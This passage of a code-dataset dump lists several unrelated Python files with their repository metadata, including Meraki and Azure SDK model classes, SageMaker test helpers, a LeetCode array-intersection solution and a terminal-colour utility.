field=models.ForeignKey(blank=True, null=True, to='tasks.Task', related_name='prototype_for'),
preserve_default=True,
),
]
|
[
"[email protected]"
] | |
bc5605235c47c590538bf12a1da25091b2f5baa9
|
fc1c1e88a191b47f745625688d33555901fd8e9a
|
/meraki_sdk/models/update_network_switch_link_aggregation_model.py
|
ae44c5120556a9d79b3eaa75edadd21fd9fcaf0c
|
[
"MIT",
"Python-2.0"
] |
permissive
|
RaulCatalano/meraki-python-sdk
|
9161673cfd715d147e0a6ddb556d9c9913e06580
|
9894089eb013318243ae48869cc5130eb37f80c0
|
refs/heads/master
| 2022-04-02T08:36:03.907147 | 2020-02-03T19:24:04 | 2020-02-03T19:24:04 | 416,889,849 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,722 |
py
|
# -*- coding: utf-8 -*-
"""
meraki_sdk
This file was automatically generated for meraki by APIMATIC v2.0 ( https://apimatic.io ).
"""
import meraki_sdk.models.switch_port_model
import meraki_sdk.models.switch_profile_port_model
class UpdateNetworkSwitchLinkAggregationModel(object):
"""Implementation of the 'updateNetworkSwitchLinkAggregation' model.
TODO: type model description here.
Attributes:
switch_ports (list of SwitchPortModel): Array of switch or stack ports
for updating aggregation group. Minimum 2 and maximum 8 ports are
supported.
switch_profile_ports (list of SwitchProfilePortModel): Array of switch
profile ports for updating aggregation group. Minimum 2 and
maximum 8 ports are supported.
"""
# Create a mapping from Model property names to API property names
_names = {
"switch_ports":'switchPorts',
"switch_profile_ports":'switchProfilePorts'
}
def __init__(self,
switch_ports=None,
switch_profile_ports=None):
"""Constructor for the UpdateNetworkSwitchLinkAggregationModel class"""
# Initialize members of the class
self.switch_ports = switch_ports
self.switch_profile_ports = switch_profile_ports
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
switch_ports = None
if dictionary.get('switchPorts') != None:
switch_ports = list()
for structure in dictionary.get('switchPorts'):
switch_ports.append(meraki_sdk.models.switch_port_model.SwitchPortModel.from_dictionary(structure))
switch_profile_ports = None
if dictionary.get('switchProfilePorts') != None:
switch_profile_ports = list()
for structure in dictionary.get('switchProfilePorts'):
switch_profile_ports.append(meraki_sdk.models.switch_profile_port_model.SwitchProfilePortModel.from_dictionary(structure))
# Return an object of this model
return cls(switch_ports,
switch_profile_ports)
|
[
"[email protected]"
] | |
c1cc6d515458baffe471b2ce6885e3399146a037
|
b095173b2dbc77c8ad61c42403258c76169b7a63
|
/tests/unit/sagemaker/feature_store/feature_processor/test_data_helpers.py
|
a539c1b8d0e12b36adf3caff9af1e6c6a5a997de
|
[
"Apache-2.0"
] |
permissive
|
aws/sagemaker-python-sdk
|
666665e717cfb76698ba3ea7563b45344634264d
|
8d5d7fd8ae1a917ed3e2b988d5e533bce244fd85
|
refs/heads/master
| 2023-09-04T01:00:20.663626 | 2023-08-31T15:29:19 | 2023-08-31T15:29:19 | 110,621,895 | 2,050 | 1,255 |
Apache-2.0
| 2023-09-14T17:37:15 | 2017-11-14T01:03:33 |
Python
|
UTF-8
|
Python
| false | false | 5,596 |
py
|
# Copyright Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
# language governing permissions and limitations under the License.
from __future__ import absolute_import
import datetime
import json
from dateutil.tz import tzlocal
from sagemaker.feature_store.feature_processor._data_source import (
CSVDataSource,
FeatureGroupDataSource,
)
from sagemaker.feature_store.feature_processor._enums import FeatureProcessorMode
from sagemaker.feature_store.feature_processor._feature_processor_config import (
FeatureProcessorConfig,
)
INPUT_S3_URI = "s3://bucket/prefix/"
INPUT_FEATURE_GROUP_NAME = "input-fg"
INPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/input-fg"
INPUT_FEATURE_GROUP_S3_URI = "s3://bucket/input-fg/"
INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI = (
"s3://bucket/input-fg/feature-store/12345789012/"
"sagemaker/us-west-2/offline-store/input-fg-12345/data"
)
FEATURE_GROUP_DATA_SOURCE = FeatureGroupDataSource(name=INPUT_FEATURE_GROUP_ARN)
S3_DATA_SOURCE = CSVDataSource(s3_uri=INPUT_S3_URI)
FEATURE_PROCESSOR_INPUTS = [FEATURE_GROUP_DATA_SOURCE, S3_DATA_SOURCE]
OUTPUT_FEATURE_GROUP_ARN = "arn:aws:sagemaker:us-west-2:12345789012:feature-group/output-fg"
FEATURE_GROUP_SYSTEM_PARAMS = {
"feature_group_name": "input-fg",
"online_store_enabled": True,
"offline_store_enabled": False,
"offline_store_resolved_s3_uri": None,
}
SYSTEM_PARAMS = {"system": {"scheduled_time": "2023-03-25T02:01:26Z"}}
USER_INPUT_PARAMS = {
"some-key": "some-value",
"some-other-key": {"some-key": "some-value"},
}
DESCRIBE_FEATURE_GROUP_RESPONSE = {
"FeatureGroupArn": INPUT_FEATURE_GROUP_ARN,
"FeatureGroupName": INPUT_FEATURE_GROUP_NAME,
"RecordIdentifierFeatureName": "id",
"EventTimeFeatureName": "ingest_time",
"FeatureDefinitions": [
{"FeatureName": "id", "FeatureType": "String"},
{"FeatureName": "model", "FeatureType": "String"},
{"FeatureName": "model_year", "FeatureType": "String"},
{"FeatureName": "status", "FeatureType": "String"},
{"FeatureName": "mileage", "FeatureType": "String"},
{"FeatureName": "price", "FeatureType": "String"},
{"FeatureName": "msrp", "FeatureType": "String"},
{"FeatureName": "ingest_time", "FeatureType": "Fractional"},
],
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"OnlineStoreConfig": {"EnableOnlineStore": True},
"OfflineStoreConfig": {
"S3StorageConfig": {
"S3Uri": INPUT_FEATURE_GROUP_S3_URI,
"ResolvedOutputS3Uri": INPUT_FEATURE_GROUP_RESOLVED_OUTPUT_S3_URI,
},
"DisableGlueTableCreation": False,
"DataCatalogConfig": {
"TableName": "input_fg_1680142547",
"Catalog": "AwsDataCatalog",
"Database": "sagemaker_featurestore",
},
},
"RoleArn": "arn:aws:iam::12345789012:role/role-name",
"FeatureGroupStatus": "Created",
"OnlineStoreTotalSizeBytes": 12345,
"ResponseMetadata": {
"RequestId": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"HTTPStatusCode": 200,
"HTTPHeaders": {
"x-amzn-requestid": "d36d3647-1632-4f4e-9f7c-2a4e38e4c6f8",
"content-type": "application/x-amz-json-1.1",
"content-length": "1311",
"date": "Fri, 31 Mar 2023 01:05:49 GMT",
},
"RetryAttempts": 0,
},
}
PIPELINE = {
"PipelineArn": "some_pipeline_arn",
"RoleArn": "some_execution_role_arn",
"CreationTime": datetime.datetime(2023, 3, 29, 19, 15, 47, 20000, tzinfo=tzlocal()),
"PipelineDefinition": json.dumps(
{
"Steps": [
{
"RetryPolicies": [
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": ["Step.SERVICE_FAULT", "Step.THROTTLING"],
},
{
"BackoffRate": 2.0,
"IntervalSeconds": 1,
"MaxAttempts": 5,
"ExceptionType": [
"SageMaker.JOB_INTERNAL_ERROR",
"SageMaker.CAPACITY_ERROR",
"SageMaker.RESOURCE_LIMIT",
],
},
]
}
]
}
),
}
def create_fp_config(
inputs=None,
output=OUTPUT_FEATURE_GROUP_ARN,
mode=FeatureProcessorMode.PYSPARK,
target_stores=None,
enable_ingestion=True,
parameters=None,
):
"""Helper method to create a FeatureProcessorConfig with fewer arguments."""
return FeatureProcessorConfig.create(
inputs=inputs or FEATURE_PROCESSOR_INPUTS,
output=output,
mode=mode,
target_stores=target_stores,
enable_ingestion=enable_ingestion,
parameters=parameters,
)
|
[
"[email protected]"
] | |
c8dcd1cedd1d97b890b8d2a3f6acf93613e18b7a
|
09df89395816834ddf77de620f959c22e74d8c00
|
/HashTable/IntersectionOfTwoArrays.py
|
c9236cc4818230a0b857c950f279ebbd7dea479b
|
[] |
no_license
|
gdh756462786/Leetcode_by_python
|
c853c4e3de255a8b4016c59944a0d40213a539a7
|
6387543a2a23c30aef1d5d37db54ca72cfb19270
|
refs/heads/master
| 2020-06-22T11:53:24.758506 | 2018-12-28T03:03:31 | 2018-12-28T03:03:31 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,543 |
py
|
# -*- coding: utf-8 -*-
'''
Given two arrays, write a function to compute their intersection.
Example:
Given nums1 = [1, 2, 2, 1], nums2 = [2, 2], return [2, 2].
'''
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
nums1.sort()
nums2.sort()
result = []
while nums1 and nums2:
if nums2[0] == nums1[0]:
result.append(nums2.pop(0))
nums1.pop(0)
else:
if nums2[0] > nums1[0]:
nums1.pop(0)
else:
nums2.pop(0)
return result
'''
方法二
class Solution(object):
def intersect(self, nums1, nums2):
"""
:type nums1: List[int]
:type nums2: List[int]
:rtype: List[int]
"""
count = {}
res = []
for item in nums1:
if item not in count:
count[item] = [1, 0]
else:
count[item][0] += 1
for item in nums2:
if item in count:
count[item][1] +=1
for key in count:
if count[key][0] * count[key][1] > 0:
for i in range(min(count[key][0], count[key][1])):
res.append(key)
return res
'''
'''
Test:
nums1 = [1,2,2,1]
nums2 = [2,2]
'''
solution = Solution()
nums1 = [1,2,2,1]
nums2 = [2,2]
res = solution.intersect(nums1, nums2)
print res
|
[
"[email protected]"
] | |
e5c24b0ad4810b600126263001991245efd2eeee
|
d7016f69993570a1c55974582cda899ff70907ec
|
/sdk/resources/azure-mgmt-resource/azure/mgmt/resource/templatespecs/v2021_05_01/models/_models_py3.py
|
341eee03d5868d8a00c8823395f60df3178711dd
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
kurtzeborn/azure-sdk-for-python
|
51ca636ad26ca51bc0c9e6865332781787e6f882
|
b23e71b289c71f179b9cf9b8c75b1922833a542a
|
refs/heads/main
| 2023-03-21T14:19:50.299852 | 2023-02-15T13:30:47 | 2023-02-15T13:30:47 | 157,927,277 | 0 | 0 |
MIT
| 2022-07-19T08:05:23 | 2018-11-16T22:15:30 |
Python
|
UTF-8
|
Python
| false | false | 24,027 |
py
|
# coding=utf-8
# pylint: disable=too-many-lines
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
import datetime
import sys
from typing import Any, Dict, List, Optional, TYPE_CHECKING, Union
from ... import _serialization
if sys.version_info >= (3, 9):
from collections.abc import MutableMapping
else:
from typing import MutableMapping # type: ignore # pylint: disable=ungrouped-imports
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from .. import models as _models
JSON = MutableMapping[str, Any] # pylint: disable=unsubscriptable-object
class AzureResourceBase(_serialization.Model):
"""Common properties for all Azure resources.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.id = None
self.name = None
self.type = None
self.system_data = None
class ErrorAdditionalInfo(_serialization.Model):
"""The resource management error additional info.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar type: The additional info type.
:vartype type: str
:ivar info: The additional info.
:vartype info: JSON
"""
_validation = {
"type": {"readonly": True},
"info": {"readonly": True},
}
_attribute_map = {
"type": {"key": "type", "type": "str"},
"info": {"key": "info", "type": "object"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.type = None
self.info = None
class ErrorResponse(_serialization.Model):
"""Common error response for all Azure Resource Manager APIs to return error details for failed operations. (This also follows the OData error response format.).
Variables are only populated by the server, and will be ignored when sending a request.
:ivar code: The error code.
:vartype code: str
:ivar message: The error message.
:vartype message: str
:ivar target: The error target.
:vartype target: str
:ivar details: The error details.
:vartype details: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorResponse]
:ivar additional_info: The error additional info.
:vartype additional_info:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorAdditionalInfo]
"""
_validation = {
"code": {"readonly": True},
"message": {"readonly": True},
"target": {"readonly": True},
"details": {"readonly": True},
"additional_info": {"readonly": True},
}
_attribute_map = {
"code": {"key": "code", "type": "str"},
"message": {"key": "message", "type": "str"},
"target": {"key": "target", "type": "str"},
"details": {"key": "details", "type": "[ErrorResponse]"},
"additional_info": {"key": "additionalInfo", "type": "[ErrorAdditionalInfo]"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.code = None
self.message = None
self.target = None
self.details = None
self.additional_info = None
class LinkedTemplateArtifact(_serialization.Model):
"""Represents a Template Spec artifact containing an embedded Azure Resource Manager template for use as a linked template.
All required parameters must be populated in order to send to Azure.
:ivar path: A filesystem safe relative path of the artifact. Required.
:vartype path: str
:ivar template: The Azure Resource Manager template. Required.
:vartype template: JSON
"""
_validation = {
"path": {"required": True},
"template": {"required": True},
}
_attribute_map = {
"path": {"key": "path", "type": "str"},
"template": {"key": "template", "type": "object"},
}
def __init__(self, *, path: str, template: JSON, **kwargs):
"""
:keyword path: A filesystem safe relative path of the artifact. Required.
:paramtype path: str
:keyword template: The Azure Resource Manager template. Required.
:paramtype template: JSON
"""
super().__init__(**kwargs)
self.path = path
self.template = template
class SystemData(_serialization.Model):
"""Metadata pertaining to creation and last modification of the resource.
:ivar created_by: The identity that created the resource.
:vartype created_by: str
:ivar created_by_type: The type of identity that created the resource. Known values are:
"User", "Application", "ManagedIdentity", and "Key".
:vartype created_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:ivar created_at: The timestamp of resource creation (UTC).
:vartype created_at: ~datetime.datetime
:ivar last_modified_by: The identity that last modified the resource.
:vartype last_modified_by: str
:ivar last_modified_by_type: The type of identity that last modified the resource. Known values
are: "User", "Application", "ManagedIdentity", and "Key".
:vartype last_modified_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:ivar last_modified_at: The timestamp of resource last modification (UTC).
:vartype last_modified_at: ~datetime.datetime
"""
_attribute_map = {
"created_by": {"key": "createdBy", "type": "str"},
"created_by_type": {"key": "createdByType", "type": "str"},
"created_at": {"key": "createdAt", "type": "iso-8601"},
"last_modified_by": {"key": "lastModifiedBy", "type": "str"},
"last_modified_by_type": {"key": "lastModifiedByType", "type": "str"},
"last_modified_at": {"key": "lastModifiedAt", "type": "iso-8601"},
}
def __init__(
self,
*,
created_by: Optional[str] = None,
created_by_type: Optional[Union[str, "_models.CreatedByType"]] = None,
created_at: Optional[datetime.datetime] = None,
last_modified_by: Optional[str] = None,
last_modified_by_type: Optional[Union[str, "_models.CreatedByType"]] = None,
last_modified_at: Optional[datetime.datetime] = None,
**kwargs
):
"""
:keyword created_by: The identity that created the resource.
:paramtype created_by: str
:keyword created_by_type: The type of identity that created the resource. Known values are:
"User", "Application", "ManagedIdentity", and "Key".
:paramtype created_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:keyword created_at: The timestamp of resource creation (UTC).
:paramtype created_at: ~datetime.datetime
:keyword last_modified_by: The identity that last modified the resource.
:paramtype last_modified_by: str
:keyword last_modified_by_type: The type of identity that last modified the resource. Known
values are: "User", "Application", "ManagedIdentity", and "Key".
:paramtype last_modified_by_type: str or
~azure.mgmt.resource.templatespecs.v2021_05_01.models.CreatedByType
:keyword last_modified_at: The timestamp of resource last modification (UTC).
:paramtype last_modified_at: ~datetime.datetime
"""
super().__init__(**kwargs)
self.created_by = created_by
self.created_by_type = created_by_type
self.created_at = created_at
self.last_modified_by = last_modified_by
self.last_modified_by_type = last_modified_by_type
self.last_modified_at = last_modified_at
class TemplateSpec(AzureResourceBase):
"""Template Spec object.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar location: The location of the Template Spec. It cannot be changed after Template Spec
creation. It must be one of the supported Azure locations. Required.
:vartype location: str
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar description: Template Spec description.
:vartype description: str
:ivar display_name: Template Spec display name.
:vartype display_name: str
:ivar metadata: The Template Spec metadata. Metadata is an open-ended object and is typically a
collection of key-value pairs.
:vartype metadata: JSON
:ivar versions: High-level information about the versions within this Template Spec. The keys
are the version names. Only populated if the $expand query parameter is set to 'versions'.
:vartype versions: dict[str,
~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpecVersionInfo]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
"location": {"required": True},
"description": {"max_length": 4096},
"display_name": {"max_length": 64},
"versions": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"description": {"key": "properties.description", "type": "str"},
"display_name": {"key": "properties.displayName", "type": "str"},
"metadata": {"key": "properties.metadata", "type": "object"},
"versions": {"key": "properties.versions", "type": "{TemplateSpecVersionInfo}"},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
description: Optional[str] = None,
display_name: Optional[str] = None,
metadata: Optional[JSON] = None,
**kwargs
):
"""
:keyword location: The location of the Template Spec. It cannot be changed after Template Spec
creation. It must be one of the supported Azure locations. Required.
:paramtype location: str
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword description: Template Spec description.
:paramtype description: str
:keyword display_name: Template Spec display name.
:paramtype display_name: str
:keyword metadata: The Template Spec metadata. Metadata is an open-ended object and is
typically a collection of key-value pairs.
:paramtype metadata: JSON
"""
super().__init__(**kwargs)
self.location = location
self.tags = tags
self.description = description
self.display_name = display_name
self.metadata = metadata
self.versions = None
class TemplateSpecsError(_serialization.Model):
"""Template Specs error response.
:ivar error: Common error response for all Azure Resource Manager APIs to return error details
for failed operations. (This also follows the OData error response format.).
:vartype error: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorResponse
"""
_attribute_map = {
"error": {"key": "error", "type": "ErrorResponse"},
}
def __init__(self, *, error: Optional["_models.ErrorResponse"] = None, **kwargs):
"""
:keyword error: Common error response for all Azure Resource Manager APIs to return error
details for failed operations. (This also follows the OData error response format.).
:paramtype error: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.ErrorResponse
"""
super().__init__(**kwargs)
self.error = error
class TemplateSpecsListResult(_serialization.Model):
"""List of Template Specs.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: An array of Template Specs.
:vartype value: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpec]
:ivar next_link: The URL to use for getting the next set of results.
:vartype next_link: str
"""
_validation = {
"next_link": {"readonly": True},
}
_attribute_map = {
"value": {"key": "value", "type": "[TemplateSpec]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, *, value: Optional[List["_models.TemplateSpec"]] = None, **kwargs):
"""
:keyword value: An array of Template Specs.
:paramtype value: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpec]
"""
super().__init__(**kwargs)
self.value = value
self.next_link = None
class TemplateSpecUpdateModel(AzureResourceBase):
"""Template Spec properties to be updated (only tags are currently supported).
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"tags": {"key": "tags", "type": "{str}"},
}
def __init__(self, *, tags: Optional[Dict[str, str]] = None, **kwargs):
"""
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
"""
super().__init__(**kwargs)
self.tags = tags
class TemplateSpecVersion(AzureResourceBase): # pylint: disable=too-many-instance-attributes
"""Template Spec Version object.
Variables are only populated by the server, and will be ignored when sending a request.
All required parameters must be populated in order to send to Azure.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar location: The location of the Template Spec Version. It must match the location of the
parent Template Spec. Required.
:vartype location: str
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
:ivar description: Template Spec version description.
:vartype description: str
:ivar linked_templates: An array of linked template artifacts.
:vartype linked_templates:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.LinkedTemplateArtifact]
:ivar metadata: The version metadata. Metadata is an open-ended object and is typically a
collection of key-value pairs.
:vartype metadata: JSON
:ivar main_template: The main Azure Resource Manager template content.
:vartype main_template: JSON
:ivar ui_form_definition: The Azure Resource Manager template UI definition content.
:vartype ui_form_definition: JSON
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
"location": {"required": True},
"description": {"max_length": 4096},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"location": {"key": "location", "type": "str"},
"tags": {"key": "tags", "type": "{str}"},
"description": {"key": "properties.description", "type": "str"},
"linked_templates": {"key": "properties.linkedTemplates", "type": "[LinkedTemplateArtifact]"},
"metadata": {"key": "properties.metadata", "type": "object"},
"main_template": {"key": "properties.mainTemplate", "type": "object"},
"ui_form_definition": {"key": "properties.uiFormDefinition", "type": "object"},
}
def __init__(
self,
*,
location: str,
tags: Optional[Dict[str, str]] = None,
description: Optional[str] = None,
linked_templates: Optional[List["_models.LinkedTemplateArtifact"]] = None,
metadata: Optional[JSON] = None,
main_template: Optional[JSON] = None,
ui_form_definition: Optional[JSON] = None,
**kwargs
):
"""
:keyword location: The location of the Template Spec Version. It must match the location of the
parent Template Spec. Required.
:paramtype location: str
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
:keyword description: Template Spec version description.
:paramtype description: str
:keyword linked_templates: An array of linked template artifacts.
:paramtype linked_templates:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.LinkedTemplateArtifact]
:keyword metadata: The version metadata. Metadata is an open-ended object and is typically a
collection of key-value pairs.
:paramtype metadata: JSON
:keyword main_template: The main Azure Resource Manager template content.
:paramtype main_template: JSON
:keyword ui_form_definition: The Azure Resource Manager template UI definition content.
:paramtype ui_form_definition: JSON
"""
super().__init__(**kwargs)
self.location = location
self.tags = tags
self.description = description
self.linked_templates = linked_templates
self.metadata = metadata
self.main_template = main_template
self.ui_form_definition = ui_form_definition
class TemplateSpecVersionInfo(_serialization.Model):
"""High-level information about a Template Spec version.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar description: Template Spec version description.
:vartype description: str
:ivar time_created: The timestamp of when the version was created.
:vartype time_created: ~datetime.datetime
:ivar time_modified: The timestamp of when the version was last modified.
:vartype time_modified: ~datetime.datetime
"""
_validation = {
"description": {"readonly": True},
"time_created": {"readonly": True},
"time_modified": {"readonly": True},
}
_attribute_map = {
"description": {"key": "description", "type": "str"},
"time_created": {"key": "timeCreated", "type": "iso-8601"},
"time_modified": {"key": "timeModified", "type": "iso-8601"},
}
def __init__(self, **kwargs):
""" """
super().__init__(**kwargs)
self.description = None
self.time_created = None
self.time_modified = None
class TemplateSpecVersionsListResult(_serialization.Model):
"""List of Template Specs versions.
Variables are only populated by the server, and will be ignored when sending a request.
:ivar value: An array of Template Spec versions.
:vartype value: list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpecVersion]
:ivar next_link: The URL to use for getting the next set of results.
:vartype next_link: str
"""
_validation = {
"next_link": {"readonly": True},
}
_attribute_map = {
"value": {"key": "value", "type": "[TemplateSpecVersion]"},
"next_link": {"key": "nextLink", "type": "str"},
}
def __init__(self, *, value: Optional[List["_models.TemplateSpecVersion"]] = None, **kwargs):
"""
:keyword value: An array of Template Spec versions.
:paramtype value:
list[~azure.mgmt.resource.templatespecs.v2021_05_01.models.TemplateSpecVersion]
"""
super().__init__(**kwargs)
self.value = value
self.next_link = None
class TemplateSpecVersionUpdateModel(AzureResourceBase):
"""Template Spec Version properties to be updated (only tags are currently supported).
Variables are only populated by the server, and will be ignored when sending a request.
:ivar id: String Id used to locate any resource on Azure.
:vartype id: str
:ivar name: Name of this resource.
:vartype name: str
:ivar type: Type of this resource.
:vartype type: str
:ivar system_data: Azure Resource Manager metadata containing createdBy and modifiedBy
information.
:vartype system_data: ~azure.mgmt.resource.templatespecs.v2021_05_01.models.SystemData
:ivar tags: Resource tags.
:vartype tags: dict[str, str]
"""
_validation = {
"id": {"readonly": True},
"name": {"readonly": True},
"type": {"readonly": True},
"system_data": {"readonly": True},
}
_attribute_map = {
"id": {"key": "id", "type": "str"},
"name": {"key": "name", "type": "str"},
"type": {"key": "type", "type": "str"},
"system_data": {"key": "systemData", "type": "SystemData"},
"tags": {"key": "tags", "type": "{str}"},
}
def __init__(self, *, tags: Optional[Dict[str, str]] = None, **kwargs):
"""
:keyword tags: Resource tags.
:paramtype tags: dict[str, str]
"""
super().__init__(**kwargs)
self.tags = tags
|
[
"[email protected]"
] | |
e2b08af0cf472fba90e20de63c2f33fe20f598d9
|
2a45af8ec8a4c87d544f461d27795a283f8f5f67
|
/python/termcolor.py
|
d653691bc187a1bbfe10735a28e6d377d5049fb5
|
[] |
no_license
|
fengidri/python-script
|
2199a16a2d0cc76e6055aec31aaced4638a8c86d
|
28fb8e6dbf9e6ba5a1f9c4c3d7b635212bfc5b66
|
refs/heads/master
| 2020-04-05T14:04:55.103302 | 2017-04-27T10:32:27 | 2017-04-27T10:32:27 | 8,678,963 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,235 |
py
|
class termcolor:
def __init__(self):
self.color_switch = True
def on(self):
self.color_switch = True
def off(self):
self.color_switch = False
def black(self,s): return self.__color(30, s)
def red(self,s): return self.__color(31, s)
def green(self,s): return self.__color(32, s)
def yellow(self,s): return self.__color(33, s)
def blue(self,s): return self.__color(34, s)
def purple(self,s): return self.__color(35, s)
def white(self,s): return self.__color(37, s)
def __color(self, color_int, s):
if self.color_switch:
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
else:
return s
def highlight(self,s):
if self.color_switch:
return "%s[30;2m%s%s[1m"%(chr(27), s, chr(27))
else:
return s
def __color(color_int, s):
return "%s[%d;2m%s%s[0m" %(chr(27), color_int, s, chr(27))
def black(s): return __color(30, s)
def red(s): return __color(31, s)
def green(s): return __color(32, s)
def yellow(s): return __color(33, s)
def blue(s): return __color(34, s)
def purple(s): return __color(35, s)
def white(s): return __color(37, s)
|
[
"[email protected]"
] | |
1cd7062e2dbbc857e50079a192f844d5b55ed6a5
|
350ecc8259bcad075bd376423335bb41cc8a533e
|
/container.py
|
d6f4dabc91f6cd2c71ee5bbf7a890d63b568db65
|
[] |
no_license
|
CodedQuen/python_begin
|
39da66ecc4a77b94a5afbbf0900727c8156b85e1
|
1433c319b5d85520c50aee00dd4b6f21a7e6366a
|
refs/heads/master
| 2022-06-10T10:30:28.807874 | 2020-04-25T03:34:03 | 2020-04-25T03:34:03 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 276 |
py
|
class Container(Object):
def __init__(self):
super(Container, self).__init__()
self._count = 0
def purge(self):
pass
purge = abstractmethod(purge)
def __iter__(self):
pass
__iter__ = abstractmethod(__iter__)
|
[
"[email protected]"
] | |
96324744aa7dddbf82ee6d0e7ad929195f6382f3
|
3db5e39d9bbe1c86229a26e7d19e3ceb37f902e3
|
/Baekjoon/DFS/11403_경로찾기.py
|
428e02133b0c4846feee49fd309f8023c6f0c0a1
|
[] |
